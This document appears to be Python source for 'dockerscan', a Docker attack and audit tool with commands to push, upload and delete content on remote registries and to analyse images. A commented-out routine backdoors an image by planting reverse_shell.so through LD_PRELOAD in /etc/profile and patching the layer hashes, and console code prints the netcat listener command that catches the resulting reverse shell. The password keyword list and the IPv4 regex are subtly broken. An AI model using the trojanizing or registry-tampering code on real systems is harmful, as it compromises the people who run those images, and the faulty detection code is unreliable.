import click


from .model import *
from .console import *
from ..helpers import check_console_input_config


@click.group("registry", help="Docker registry actions")
@click.pass_context
def registry(ctx, **kwargs):
    pass


@registry.command(help="get a summary from remote registry")
@click.pass_context
@click.argument("registry")
def info(ctx, **kwargs):
    config = DockerAnalyzeInfoModel(**ctx.obj, **kwargs)

    # Check if valid
    if check_console_input_config(config):
        launch_dockerscan_analyze_info_in_console(config)


@registry.command(help="Push a docker image to remote registry")
@click.pass_context
@click.argument("registry")
@click.argument("local_image")
@click.argument("image_name")
@click.option("--tag", "-t", default="latest")
def push(ctx, **kwargs):
    config = DockerAnalyzePushModel(**ctx.obj, **kwargs)

    # Check if valid
    if check_console_input_config(config):
        launch_dockerscan_analyze_push_in_console(config)


@registry.command(help="upload a file to remote registry")
@click.pass_context
@click.argument("registry")
@click.argument("local_file")
@click.option("--remote-filename", "-r", "remote_filename")
def upload(ctx, **kwargs):
    config = DockerAnalyzeUploadModel(**ctx.obj, **kwargs)

    # Check if valid
    if check_console_input_config(config):
        launch_dockerscan_analyze_upload_in_console(config)


@registry.command(help="delete a image form remote registry")
@click.pass_context
@click.argument("registry")
@click.argument("image_name")
@click.option("--tag", "-t", default="latest")
def delete(ctx, **kwargs):
    config = DockerAnalyzePushModel(**ctx.obj, **kwargs)

    # Check if valid
    if check_console_input_config(config):
        launch_dockerscan_analyze_delete_in_console(config)



import re
import string

from collections import defaultdict

from .model import DockerImageInfo

PASSWORD_KEYWORDS = (
    "pwd",
    "passwd"
    "password"
    "cred",
    "credential"
    "auth"
)

REGEX_URN = re.compile('[a-z\-]{0,6}://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+')
REGEX_IPV6 = re.compile(r'''(\A([0-9a-f]{1,4}:){1,1}(:[0-9a-f]{1,4}){1,6}\Z)|(\A([0-9a-f]{1,4}:){1,2}(:[0-9a-f]{1,4}){1,5}\Z)|(\A([0-9a-f]{1,4}:){1,3}(:[0-9a-f]{1,4}){1,4}\Z)|(\A([0-9a-f]{1,4}:){1,4}(:[0-9a-f]{1,4}){1,3}\Z)|(\A([0-9a-f]{1,4}:){1,5}(:[0-9a-f]{1,4}){1,2}\Z)|(\A([0-9a-f]{1,4}:){1,6}(:[0-9a-f]{1,4}){1,1}\Z)|(\A(([0-9a-f]{1,4}:){1,7}|:):\Z)|(\A:(:[0-9a-f]{1,4}){1,7}\Z)|(\A((([0-9a-f]{1,4}:){6})(25[0-5]|2[0-4]\d|[0-1]?\d?\d)(\.(25[0-5]|2[0-4]\d|[0-1]?\d?\d)){3})\Z)|(\A(([0-9a-f]{1,4}:){5}[0-9a-f]{1,4}:(25[0-5]|2[0-4]\d|[0-1]?\d?\d)(\.(25[0-5]|2[0-4]\d|[0-1]?\d?\d)){3})\Z)|(\A([0-9a-f]{1,4}:){5}:[0-9a-f]{1,4}:(25[0-5]|2[0-4]\d|[0-1]?\d?\d)(\.(25[0-5]|2[0-4]\d|[0-1]?\d?\d)){3}\Z)|(\A([0-9a-f]{1,4}:){1,1}(:[0-9a-f]{1,4}){1,4}:(25[0-5]|2[0-4]\d|[0-1]?\d?\d)(\.(25[0-5]|2[0-4]\d|[0-1]?\d?\d)){3}\Z)|(\A([0-9a-f]{1,4}:){1,2}(:[0-9a-f]{1,4}){1,3}:(25[0-5]|2[0-4]\d|[0-1]?\d?\d)(\.(25[0-5]|2[0-4]\d|[0-1]?\d?\d)){3}\Z)|(\A([0-9a-f]{1,4}:){1,3}(:[0-9a-f]{1,4}){1,2}:(25[0-5]|2[0-4]\d|[0-1]?\d?\d)(\.(25[0-5]|2[0-4]\d|[0-1]?\d?\d)){3}\Z)|(\A([0-9a-f]{1,4}:){1,4}(:[0-9a-f]{1,4}){1,1}:(25[0-5]|2[0-4]\d|[0-1]?\d?\d)(\.(25[0-5]|2[0-4]\d|[0-1]?\d?\d)){3}\Z)|(\A(([0-9a-f]{1,4}:){1,5}|:):(25[0-5]|2[0-4]\d|[0-1]?\d?\d)(\.(25[0-5]|2[0-4]\d|[0-1]?\d?\d)){3}\Z)|(\A:(:[0-9a-f]{1,4}){1,5}:(25[0-5]|2[0-4]\d|[0-1]?\d?\d)(\.(25[0-5]|2[0-4]\d|[0-1]?\d?\d)){3}\Z)''')
REGEX_IPV4 = re.compile(r'''((([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\.){3}([
0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])) ''')
REGEX_EXTRACT_ENV_VAR = re.compile(r'''(\$[{]*[\w]+[}]*)''')
REGEX_EXTRACT_ENV_VAR_NAME = re.compile(r'''(\$[{]*)([\w]+)([}]*)''')


class DockerImageAnalysisResults:
    PASSWORD = "password"
    URN = "URL-IP"

    def __init__(self):
        self.running_user = ""
        self.sensitive_data = defaultdict(dict)
        self.warnings = defaultdict(set)

    def add_user(self, user_name):
        # if image_info.user == "" or image_info.working_dir == "/root":
        #     results.add_user("root")
        if not self.running_user:
            self.running_user = user_name
        elif self.running_user != "root" and user_name != "root":
            self.running_user = user_name

    def add_sensitive(self, sensitive_data_type, location, data):
        assert sensitive_data_type in (self.PASSWORD, self.URN)

        try:
            d = self.sensitive_data[sensitive_data_type][location]
            d.add(data)
        except KeyError:
            self.sensitive_data[sensitive_data_type][location] = set()
            self.sensitive_data[sensitive_data_type][location].add(data)

    def add_warning(self, location, message):
        self.warnings[location].add(message)


def _replace_bash_vars_in_string(text: str, image_metadata: list) -> str:
    # Extract var name
    var_name_mark = REGEX_EXTRACT_ENV_VAR.search(text).group(1)
    var_name = REGEX_EXTRACT_ENV_VAR_NAME.search(var_name_mark).group(2)

    # Search in environment vars
    for env in image_metadata:
        env_name, env_value = env.split("=", maxsplit=1)

        if var_name in env_name:
            text = text.replace(var_name_mark,
                                env_value)
            break
    return text


# --------------------------------------------------------------------------
# Content helpers function
# --------------------------------------------------------------------------
def _build_start_point(image_metadata) -> str:
    # Build the launching command
    entrypoint = image_metadata.entry_point

    if type(entrypoint) is list:
        entrypoint = " ".join(entrypoint)

    # Locate the entry-point
    cmd = image_metadata.cmd
    if image_metadata.cmd:
        if type(image_metadata.cmd) is list:
            cmd = " ".join(image_metadata.cmd)

    if entrypoint and cmd:
        start_point = "{} {}".format(entrypoint, cmd)
    elif entrypoint and not cmd:
        start_point = entrypoint
    elif not entrypoint and cmd:
        start_point = cmd
    else:
        start_point = ""

    return start_point.strip()


def _find_user_in_start_point(image_location: str,
                              start_point: str,
                              image_metadata: DockerImageInfo) -> str:
    launch_command = start_point

    is_binary = False
    # If start point is a shell script, then open it
    if launch_command.endswith("sh"):
        _shell_path = start_point[start_point.rfind(" ") + 1:]
        _shell_location = "{}/{}".format(image_location,
                                         _shell_path)

        # Clean
        _shell_location = _shell_location.replace("//", "/")

        # If command has any environment var -> replace it
        if "$" in _shell_location:
            _shell_location = _replace_bash_vars_in_string(
                _shell_location,
                image_metadata.environment)

        # Clean
        _shell_location = _shell_location.replace("//", "/")

        # Check if _shell is a binary file
        is_binary = open(_shell_location,
                         "r",
                         errors="ignore").read(1) in string.printable
        if not is_binary:
            launch_command = open(_shell_location, "r", errors="ignore").read()

    #
    # Try to find "sudo" or "gosu" or "su -c '...'"
    #
    SUDO_PATTERNS = ("sudo", "gosu", "su -c")
    if not is_binary:
        for pattern in SUDO_PATTERNS:
            if pattern in launch_command:
                return "non-root"
        else:
            return "root"
    else:
        return "root"


def _find_domains_and_ips_in_text(text) -> str:
    ipv4 = REGEX_IPV4.search(text)
    if ipv4:
        return text[ipv4.start():ipv4.end()]

    ipv6 = REGEX_IPV6.search(text)
    if ipv6:
        return text[ipv6.start():ipv6.end()]

    urn = REGEX_URN.search(text)
    if urn:
        return text[urn.start():urn.end()]

    return ""


def _find_password_in_text(text):
    for k in PASSWORD_KEYWORDS:
        if k in text:
            return True
    return False


# --------------------------------------------------------------------------
# Public API
# --------------------------------------------------------------------------
def search_in_metadata(image_info: DockerImageInfo,
                       results: DockerImageAnalysisResults):
    """
    Search sensitive information in metadata:

    - Passwords in environments vars
    - Detect root user running
    - Excessive port exposed
    """

    # Try to find passwords in vars environments
    for env in image_info.environment:
        if _find_password_in_text(env):
            results.add_sensitive(DockerImageAnalysisResults.PASSWORD,
                                  "environment_var",
                                  env)

        urn = _find_domains_and_ips_in_text(env)
        if urn:
            results.add_sensitive(DockerImageAnalysisResults.URN,
                                  "environment_var",
                                  urn)

    # Try to check if root is running as root
    if image_info.user:
        results.add_user(image_info.user)

    # Many ports exposed?
    if len(image_info.exposed_ports) > 4:
        results.add_warning("exposed_ports",
                            "Docker image has more thant 4 ports are exposed")


def search_in_content(image_location: str,
                      image_metadata: DockerImageInfo,
                      results: DockerImageAnalysisResults):

    start_point = _build_start_point(image_metadata)

    user = _find_user_in_start_point(image_location,
                                     start_point,
                                     image_metadata)

    results.add_user(user)


def analyze_docker_image(image_extracted_location: str,
                         image_info: DockerImageInfo) -> \
        DockerImageAnalysisResults:

    results = DockerImageAnalysisResults()

    # Search in metadata
    search_in_metadata(image_info, results)

    # Search in content
    search_in_content(image_extracted_location,
                      image_info,
                      results)

    return results


__all__ = ("analyze_docker_image", "search_in_content", "search_in_metadata")



import random
import string

from typing import Union

from .model import *
from ...core.exceptions import DockerscanTimeoutError
from ..helpers import get_remote_registry_info, sanitize_url, \
    get_ssl_common_names

from .libs import *


def run_analyze_info_dockerscan(config: DockerAnalyzeInfoModel) -> \
        Union[DockerscanTimeoutError,
              RemoteRegistryDetails]:

    assert isinstance(config, DockerAnalyzeInfoModel)

    # Sanitize the URL
    target = sanitize_url(config.registry)

    # Detect remote version and if is authenticated
    version, is_auth = get_remote_registry_info(target)

    ssl_domains = get_ssl_common_names(target)

    # Build the results
    result = RemoteRegistryDetails(target,
                                   version,
                                   ssl_domains,
                                   is_auth)

    if result.version == 2:
        result.add_respositories(list_repositories_v2(target))

    return result


def run_analyze_push_dockerscan(config: DockerAnalyzePushModel):

    assert isinstance(config, DockerAnalyzePushModel)

    # Sanitize the URL
    target = sanitize_url(config.registry)

    link = push_image_v2(target,
                         config.image_name,
                         config.local_image,
                         config.tag)

    return link


def run_analyze_upload_dockerscan(config: DockerAnalyzeUploadModel):

    assert isinstance(config, DockerAnalyzeUploadModel)

    # Sanitize the URL
    target = sanitize_url(config.registry)

    # Build remote file name
    remote_filename = config.remote_filename
    if not remote_filename:
        characters = string.ascii_lowercase + string.digits

        remote_filename = "".join(random.choice(characters)
                                  for x in range(random.randint(5, 20)))

    link, _ = upload_content_v2(target,
                                remote_filename,
                                config.local_file)

    return link


def run_analyze_delete_dockerscan(config: DockerAnalyzePushModel):

    assert isinstance(config, DockerAnalyzePushModel)

    # Sanitize the URL
    target = sanitize_url(config.registry)

    delete_image_v2(target, config.image_name, config.tag)


__all__ = ("run_analyze_info_dockerscan", "run_analyze_push_dockerscan",
           "run_analyze_delete_dockerscan", "run_analyze_upload_dockerscan")



import os
import logging

from dockerscan import get_log_level, run_in_console

from .api import *
from .model import *
from ..helpers import display_results_console

log = logging.getLogger('dockerscan')


def launch_dockerscan_image_info_in_console(config: DockerImageInfoModel):
    """Launch in console mode"""

    log.setLevel(get_log_level(config.verbosity))

    with run_in_console(config.debug):

        log.console("Starting analyzing docker image...")
        log.console("Selected image: '{}'".format(
            os.path.basename(config.image_path)))

        results = run_image_info_dockerscan(config)

        # Display image summary
        log.console("Analysis finished. Results:")
        display_results_console(results, log)


def launch_dockerscan_image_extract_in_console(config: DockerImageInfoModel):
    """Launch in console mode"""

    log.setLevel(get_log_level(config.verbosity))

    with run_in_console(config.debug):

        log.console("Starting the extraction of docker image...")
        log.console("Selected image: '{}'".format(
            os.path.basename(config.image_path)))

        run_image_extract_dockerscan(config)

        # Display image summary
        log.console("Image content extracted")


def launch_dockerscan_image_analyze_in_console(config: DockerImageAnalyzeModel):
    """Launch in console mode"""

    log.setLevel(get_log_level(config.verbosity))

    with run_in_console(config.debug):

        log.console("Starting the analysis of docker image...")
        log.console("Selected image: '{}'".format(
            os.path.basename(config.image_path)))

        results = run_image_analyze_dockerscan(config)

        # Display image summary
        log.console("Analysis finished. Results:")
        display_results_console(results, log)


__all__ = ("launch_dockerscan_image_info_in_console",
           "launch_dockerscan_image_extract_in_console",
           "launch_dockerscan_image_analyze_in_console")



from collections import defaultdict

from dockerscan import SharedConfig, String


class DockerImageInfoModel(SharedConfig):
    image_path = String()


class DockerImageAnalyzeModel(SharedConfig):
    image_path = String()


class DockerImageExtractModel(SharedConfig):
    image_path = String()
    extract_path = String()


class DockerImageInfo:

    def __init__(self):
        self.author = ""
        self.host_name = ""
        self.entry_point = ""
        self.working_dir = ""
        self.created_date = ""
        self.docker_version = ""
        self.cmd = ""
        self.labels = []
        self.environment = []
        self.user = ""

        #: dict - { PORT_NO: ["TCP", "UDP"]}
        #: dict - { PORT_NO: ["TCP"]}
        self.exposed_ports = defaultdict(set)

    def add_layer_info(self, layer_info: dict):
        # Get container config
        # container_config = layer_info.get("container_config", None)
        container_config = layer_info.get("config", None)

        if container_config:
            basic_info = {
                "Hostname": "host_name",
                "WorkingDir": "working_dir",
                "Entrypoint": "entry_point",
                "User": "user"
            }
            list_info = {
                "Env": "environment",
                "Labels": "labels"
            }

            for json_prop, class_prop in basic_info.items():
                json_value = container_config.get(json_prop)
                if json_value:
                    setattr(self, class_prop, json_value)

            for json_prop, class_prop in list_info.items():
                json_value = container_config.get(json_prop)
                if json_value:
                    class_value = getattr(self, class_prop)
                    class_value.extend(json_value)

            if container_config.get("Cmd", None):
                # Get only the Cmd Command of the last layer
                if "container" in layer_info:
                    self.cmd = " ".join(container_config.get("Cmd"))

            # Add exposed ports
            if container_config.get("ExposedPorts"):
                for port in container_config.get("ExposedPorts").keys():
                    port, proto = port.split("/")

                    self.exposed_ports[port].add(proto)

        # Only storage the date for the last layer. And only the last layer
        # contains "container" property
        if layer_info.get("container", None):
            self.created_date = layer_info.get("created")

        if layer_info.get("author"):
            self.author = layer_info.get("author")

        if layer_info.get("docker_version"):
            self.docker_version = layer_info.get("docker_version")


__all__ = ("DockerImageInfoModel", "DockerImageInfo",
           "DockerImageExtractModel", "DockerImageAnalyzeModel",)



import pytest

from dockerscan.actions.default.api import run_default_dockerscan


def test_run_default_dockerscan_runs_ok():

    #
    # FILL THIS WITH A TEST
    #
    # assert run_default_dockerscan() is None
    pass


def test_run_default_dockerscan_empty_input():

    with pytest.raises(AssertionError):
        run_default_dockerscan(None)



from click.testing import CliRunner
from dockerscan.actions.default.cli import cli


def test_parser_cli_runs_ok():
    runner = CliRunner()
    result = runner.invoke(cli, ["-h"])
    
    assert result.exit_code == 0



import os
import logging

from dockerscan import get_log_level, run_in_console

from .api import *
from .model import *

log = logging.getLogger('dockerscan')


def launch_dockerscan_image_modify_trojanize_in_console(
        config: DockerImageInfoModifyTrojanizeModel):
    """Launch in console mode"""

    log.setLevel(get_log_level(config.verbosity))

    with run_in_console(config.debug):

        log.console("Starting analyzing docker image...")
        log.console("Selected image: '{}'".format(
            os.path.basename(config.image_path)))

        run_image_modify_trojanize_dockerscan(config)

        log.console("Image troyanized successful")
        log.console("Trojanized image location:")
        log.console("  > {}".format(
            "{}.tar".format(os.path.abspath(config.output_image))
            if config.output_image else
            "{}.tar".format(
                os.path.abspath(os.path.basename(config.image_path)))
        ))
        log.console("To receive the reverse shell, only write:")
        log.console("  > nc -v -k -l {} {}".format(
            config.remote_addr,
            config.remote_port
        ))


def launch_dockerscan_image_modify_user_in_console(
        config: DockerImageInfoModifyUserModel):
    """Launch in console mode"""

    log.setLevel(get_log_level(config.verbosity))

    with run_in_console(config.debug):

        log.console("Starting analyzing docker image...")
        log.console("Selected image: '{}'".format(
            os.path.basename(config.image_path)))
        log.console("Updating to the new user: '{}'".format(
            os.path.basename(config.new_user)))

        run_image_modify_user_dockerscan(config)

        log.console("User updated successful")


def launch_dockerscan_image_modify_entrypoint_in_console(
        config: DockerImageInfoModifyEntryPointModel):
    """Launch in console mode"""

    log.setLevel(get_log_level(config.verbosity))

    with run_in_console(config.debug):

        log.console("Starting analyzing docker image...")
        log.console("Selected image: '{}'".format(
            os.path.basename(config.image_path)))
        log.console("Updating to the new entry-point: '{}'".format(
            os.path.basename(config.new_entry_point)))

        run_image_modify_entry_point_dockerscan(config)

        log.console("Entry-point updated successful")


__all__ = ("launch_dockerscan_image_modify_trojanize_in_console",
           "launch_dockerscan_image_modify_user_in_console",
           "run_image_modify_entry_point_dockerscan",
           "launch_dockerscan_image_modify_entrypoint_in_console")



# import io
# import json
# import shutil
# import os.path
# import tarfile
# import logging
# import hashlib
# import tempfile
# from typing import List, Dict
#
# from .model import *
# from ..docker_commands import *
#
# log = logging.getLogger("dockerscan")
#
#
# def run_image_modify_trojanize_dockerscan(
#         config: DockerImageInfoModifyTrojanizeModel):
#     assert isinstance(config, DockerImageInfoModifyTrojanizeModel)
#
#     output_docker_image = config.output_image
#     image_path = config.image_path
#
#     if not output_docker_image:
#         output_docker_image = os.path.basename(config.image_path)
#     if not output_docker_image.endswith("tar"):
#         output_docker_image += ".tar"
#
#     # 1.1 - Get layers info
#     log.debug(" > Opening docker file")
#     with open_docker_image(image_path) as (
#             img, top_layer, _, manifest):
#
#         # 1.2 - Get the last layer in manifest
#         log.debug(" > Getting de last layer in the docker image")
#
#         # Layers are ordered in inverse order
#         last_layer = get_layers_ids_from_manifest(manifest)[-1]
#         log.debug(" > Last layer: {}".format(last_layer))
#
#         # 1.3 - Extract the last layer
#         with tempfile.TemporaryDirectory() as d:
#
#             log.debug(" > Extracting layer content in temporal "
#                       "dir: {}".format(d))
#             extract_docker_layer(img, last_layer, d)
#
#             # 1.4 - Trojanize
#
#             log.info(" > Starting trojaning process")
#
#             # 1.4.1 - Copy the shell
#             src_shell_path = os.path.join(os.path.dirname(__file__),
#                                           "shells",
#                                           "reverse_shell.so")
#
#             dst_shell_path = os.path.join(d, "etc/")
#             container_image_path = "/etc/reverse_shell.so"
#             container_profile_path = os.path.join(d, "etc/profile")
#
#             log.info(" > Coping the shell: 'reverse_shell.so' "
#                      "to '/etc/profile'")
#
#             if not os.path.exists(os.path.join(d, "etc")):
#                 os.makedirs(os.path.join(d, "etc"))
#
#             shutil.copy(src_shell_path,
#                         dst_shell_path)
#
#             # 1.4.2 - Add LD_PRELOAD to profile
#             log.info(" > Add LD_PRELOAD to /etc/profile")
#             with open(container_profile_path, "a") as p:
#                 p.write("export LD_PRELOAD={}\n".format(
#                     container_image_path))
#
#             # 1.5 - Build the new layer.zip from modified file
#             log.info(" > Building new layer.tar file with trojanized system")
#             new_layer_path = os.path.join(d, "new_layer.tar")
#             with tarfile.open(new_layer_path, "w") as nl:
#                 nl.add(d, arcname="/")
#
#             # 1.6 - Calculating the SHA 256 hash
#             log.info(" > Calculating new SHA256 hash for the new layer")
#             with open(new_layer_path, "rb") as f:
#                 m = hashlib.sha256()
#                 m.update(f.read())
#                 new_layer_sha256 = m.hexdigest()
#
#             log.info(" > Updating the manifest")
#             # 1.7 - Updating the manifest
#             new_manifest = manifest
#
#             # Find the old last layer
#             for i, layer_id in enumerate(new_manifest[0]["Layers"]):
#                 if last_layer in layer_id:
#                     break
#             new_manifest[0]["Layers"][i] = "{}/layer.tar" \
#                                            "".format(new_layer_sha256)
#
#             # 1.7 - Create new docker image
#             log.info(" > Creating new docker image")
#             with tarfile.open(output_docker_image, "w") as s:
#
#                 for f in img.getmembers():
#                     log.debug("    _> Processing file: {}".format(f.name))
#
#                     # Add new manifest
#                     if f.name == "manifest.json":
#                         # Dump Manifest to JSON
#                         new_manifest_json = json.dumps(new_manifest).encode()
#                         t = tarfile.TarInfo("manifest.json")
#                         t.size = len(new_manifest_json)
#
#                         s.addfile(t, io.BytesIO(new_manifest_json))
#
#                     # Add new trojanized layer
#                     elif last_layer in f.name:
#                         # Skip for old layer.tar file
#                         if "layer" in f.name:
#                             continue
#
#                         # Add the layer.tar
#                         if f.name == last_layer:
#                             log.debug(
#                                 "    _> Replacing layer {} by {}".format(
#                                     f.name,
#                                     new_layer_sha256
#                                 ))
#                             s.add(new_layer_path,
#                                   "{}/layer.tar".format(new_layer_sha256))
#                         else:
#                             #
#                             # Extra files: "json" and "VERSION"
#                             #
#                             c = img.extractfile(f).read()
#                             t = tarfile.TarInfo("{}/{}".format(
#                                 new_layer_sha256,
#                                 os.path.basename(f.name)
#                             ))
#
#                             if "json" in f.name:
#                                 # Modify the JSON content to add the new
#                                 # hash
#                                 c = c.decode(). \
#                                     replace(last_layer,
#                                             new_layer_sha256).encode()
#
#                             t.size = len(c)
#                             s.addfile(t, io.BytesIO(c))
#
#                     elif ".json" in f.name and "/" not in f.name:
#                         c = img.extractfile(f).read()
#                         t = tarfile.TarInfo(f.name)
#
#                         # Modify the JSON content to add the new
#                         # hash
#                         j = json.loads(c.decode())
#                         j["rootfs"]["diff_ids"][-1] = \
#                             "sha256:{}".format(new_layer_sha256)
#
#                         new_c = json.dumps(j).encode()
#
#                         t.size = len(new_c)
#                         s.addfile(t, io.BytesIO(new_c))
#
#                     # Add the rest of files / dirs
#                     else:
#                         s.addfile(f, img.extractfile(f))
#
#
# __all__ = ("run_image_modify_trojanize_dockerscan",)




from dockerscan import SharedConfig, String, Integer


class DockerScanModel(SharedConfig):
    ports = String(default="443,80,8080,8000,5000")
    target = String()
    concurrency = String(default="4")
    timeout = String(default="2")

__all__ = ("DockerScanModel",)



import os
from typing import Set, Tuple, Union

import requests

from dxf import DXF
from dockerscan import DockerscanNotExitsError, DockerscanError


def _get_digest_by_tag(registry: str,
                       remote_image_name: str,
                       tag: str) -> str:
    insecure, registry_without_schema = _get_schema_and_security(registry)

    d = DXF(registry_without_schema,
            remote_image_name,
            insecure=insecure)

    try:
        return d.get_alias(alias=tag)[0]
    except (IndexError, requests.exceptions.HTTPError):
        return ""


def _get_schema_and_security(registry:str) -> tuple:
    insecure = True
    if registry.startswith("https://"):
        insecure = False

    if registry.startswith("http"):
        k = "://"
        registry_without_schema = registry[registry.find(k) + len(k):]
    else:
        registry_without_schema = registry

    return insecure, registry_without_schema


def list_repositories_v2(registry: str):

    # List repositories
    r = requests.get("{}/v2/_catalog".format(registry),
                     timeout=2,
                     allow_redirects=False,
                     verify=False)
    return r.json().get("repositories", [])


def upload_content_v2(registry: str,
                      remote_image_name: str,
                      local_image: str) -> Tuple[str, str]:
    """
    Push a content to Docker Registry and return the URL to access

    :return: a tuple (image_link: str, image_digest: str)
    """

    # Replace \\ -> none --> because in command line we can't write
    # "nginx:latest" without the \\ ---> "nginx\:latest"
    _image = os.path.abspath(local_image.replace("\\", ""))

    if not os.path.exists(_image):
        raise DockerscanNotExitsError("Local image selected do not exits")

    insecure, registry_without_schema = _get_schema_and_security(registry)

    d = DXF(registry_without_schema,
            remote_image_name,
            insecure=insecure)
    image_digest = d.push_blob(_image)

    # Image link
    img_link = "{schema}://{host}/v2/{repo}/blobs/sha256:{digest}".format(
        schema="http" if insecure else "https",
        host=registry_without_schema,
        repo=remote_image_name,
        digest=image_digest
    )

    return img_link, image_digest


def push_image_v2(registry: str,
                  remote_image_name: str,
                  local_image: str,
                  tag: str) -> str:
    """Push a content to Docker Registry and return the URL to access"""

    insecure, registry_without_schema = _get_schema_and_security(registry)

    download_link, digest = upload_content_v2(registry, remote_image_name, local_image)

    d = DXF(registry_without_schema,
            remote_image_name,
            insecure=insecure)
    d.set_alias(tag, digest)

    return download_link


def delete_image_v2(registry: str,
                    remote_image_name: str,
                    tag: str = "latest") -> Union[Set[str],
                                                  DockerscanError]:
    """
    delete selected images from remote repo.

        remote_image_name can contain regex expressions.

    :return: return a set() with the images deleted
    """
    insecure, registry_without_schema = _get_schema_and_security(registry)

    d = DXF(registry_without_schema,
            remote_image_name,
            insecure=insecure)

    removed = set()

    # Getting remote digest for the tag
    digest = _get_digest_by_tag(registry, remote_image_name, tag)

    if not digest:
        raise DockerscanError("> Can't obtain digest reference for selected "
                              "image / tag")

    try:
        if digest:
            # If digest found -> remote image is not a regex. Then remove it

            d.del_alias(digest)

            removed.add(remote_image_name)

        return removed

    except requests.exceptions.HTTPError:
        raise DockerscanError("> Registry does not support delete "
                              "operations. Default Docker Registry does not "
                              "support deletion. For more information see: "
                              "https://docs.docker.com/registry/"
                              "configuration/")

__all__ = ("list_repositories_v2", "upload_content_v2", "push_image_v2",
           "delete_image_v2")



import logging

from dockerscan import get_log_level, DockerscanTimeoutError, run_in_console, \
    DockerscanError

from .api import *
from .model import *
from ..helpers import sanitize_url, display_results_console

log = logging.getLogger('dockerscan')


def launch_dockerscan_analyze_info_in_console(config: DockerAnalyzeInfoModel):

    log.setLevel(get_log_level(config.verbosity))

    with run_in_console(config.debug):

        try:
            log.console("Starting analyzing docker Registry...")
            log.console("Selected registry: '{}'".format(
                sanitize_url(config.registry)))

            results = run_analyze_info_dockerscan(config)

            # Show results
            log.console("Analysis finished. Results:")
            display_results_console(results, log)
        except DockerscanTimeoutError as e:
            log.console(e)


def launch_dockerscan_analyze_push_in_console(config: DockerAnalyzePushModel):

    log.setLevel(get_log_level(config.verbosity))

    with run_in_console(config.debug):

        try:
            log.console("Starting pushing process to Registry...")
            log.console("Selected registry: '{}'".format(
                sanitize_url(config.registry)))

            link = run_analyze_push_dockerscan(config)

            # Show results
            log.console("Image uploaded")
            log.console("  > {}".format(link))

        except DockerscanTimeoutError as e:
            log.console(e)


def launch_dockerscan_analyze_upload_in_console(config: DockerAnalyzeUploadModel):

    log.setLevel(get_log_level(config.verbosity))

    with run_in_console(config.debug):

        try:
            log.console("Uploading file to Registry...")
            log.console("Selected registry: '{}'".format(
                sanitize_url(config.registry)))

            link = run_analyze_upload_dockerscan(config)

            # Show results
            log.console("File location:")
            log.console("  > {}".format(link))

        except DockerscanTimeoutError as e:
            log.console(e)


def launch_dockerscan_analyze_delete_in_console(config: DockerAnalyzePushModel):

    log.setLevel(get_log_level(config.verbosity))

    with run_in_console(config.debug):

        try:
            log.console("Starting delete process to Registry...")
            log.console("Selected registry: '{}'".format(
                sanitize_url(config.registry)))

            run_analyze_delete_dockerscan(config)

            log.console("Deleted images")

            # Show results
            log.console("Image uploaded")
        except DockerscanError as e:
            log.console(e)
        except DockerscanTimeoutError as e:
            log.console(e)


__all__ = ("launch_dockerscan_analyze_info_in_console",
           "launch_dockerscan_analyze_push_in_console",
           "launch_dockerscan_analyze_delete_in_console",
           "launch_dockerscan_analyze_upload_in_console")



import ssl
import socket
import logging

from typing import Union, Set
from urllib.parse import urlparse
from collections import defaultdict

import requests

from requests.exceptions import ConnectTimeout, ConnectionError

from ..core.model import SharedConfig
from ..core.exceptions import DockerscanTimeoutError

requests.packages.urllib3.disable_warnings()


def check_console_input_config(config: SharedConfig,
                               log: logging.Logger = None) -> bool:

    log = log or logging.getLogger(__package__.split(".", maxsplit=1)[0])

    # Check if config is valid
    if not config.is_valid:
        for prop, msg in config.validation_errors:

            log.critical("[!] '%s' property %s" % (prop, msg))
        return False

    return True


def sanitize_url(url: str, port: int = 5000, schema: str = "http") -> str:
    if ":" not in url:
        url = "{}:{}".format(url, port)

    if not url.startswith("http"):
        url = "http://{}".format(url)

    return url


def get_ssl_common_names(remote: str) -> set:
    """This function extract the Common Names from a SSL certificate"""

    # Extract info from URL
    scheme, hostname, *_ = urlparse(remote)

    if ":" in hostname:
        hostname, port = hostname.split(":")
        port = int(port)
    elif "https" == scheme:
        hostname, port = hostname, 443
    else:
        return set()

    ret = set()

    ctx = ssl.create_default_context()
    s = ctx.wrap_socket(socket.socket(), server_hostname="*")
    try:
        s.connect((hostname, port))
    except ssl.CertificateError as e:
        key = "match either of "
        msg = str(e)

        # Extract domain from SSL CN
        msg = msg[msg.index(key) + len(key):]

        # Clear
        domains = msg.replace("'", "").replace(" ", "")

        # Unify domains
        for domain in domains.split(","):
            if domain.startswith("*"):
                domain = domain[2:]

            ret.add(domain)
    except ssl.SSLError:
        pass

    return ret


def get_remote_registry_info(target: str) -> Union[Set,
                                                   DockerscanTimeoutError]:
    """
    This function does two things:

    - detect the remote registry version. Allowed returned values are: {1, 2}
    - detect if remote Docker Registry has enabled the authentication

    :return: a tuple as format: (REMOTE_VERSION, ENABLED_OR_NOT_AUTH)
    :rtype: tuple(int, bool)

    :raise DockerscanTimeoutError: If remote server reach a timeout
    """
    #
    # Check for verion 2
    #
    remote_version = 1
    enabled_auth = False

    try:
        r = requests.get("{}/v2/".format(target),
                         timeout=2,
                         allow_redirects=False,
                         verify=False)

        if r.status_code in (200, 401):
            if "registry/2.0" in r.headers["Docker-Distribution-Api-Version"]:
                remote_version = 2

            if r.status_code == 401:
                enabled_auth = True

        return remote_version, enabled_auth

    except (ConnectTimeout, ConnectionError) as e:
        raise DockerscanTimeoutError("Remote registry '{}' do not responds".
                                     format(target))


def display_results_console(results: Union[dict, list], log, start_padding=0):

    # Check if results is and object / class or a basic type:
    if str(type(results))[8:].strip().startswith("dockerscan"):
        results = {x: y for x, y in results.__dict__.items()
                   if not x.startswith("_") and y and type(y) is not bool}

    prefix_symbols = ["-", ">", "+", "_", "\\"]

    padding = "{}{} ".format(" " * (0 if start_padding == 0
                                    else start_padding * 2),
                             prefix_symbols[start_padding],)
    new_padding = start_padding + 1

    if isinstance(results, dict):
        for prop, value in results.items():
            # Do not put: "not value" because it will ignore entries
            # with value "False", and we want theres values
            pretty_prop = prop.capitalize().replace("_", " ")

            # List will be displayed different
            if type(value) not in (bytes, str, int, float, bool):
                log.console("{}{}:".format(padding,
                                           pretty_prop))

                display_results_console(value,
                                        log,
                                        new_padding)
            # Plain properties
            else:
                log.console("{}{} = {}".format(padding,
                                               pretty_prop,
                                               value))

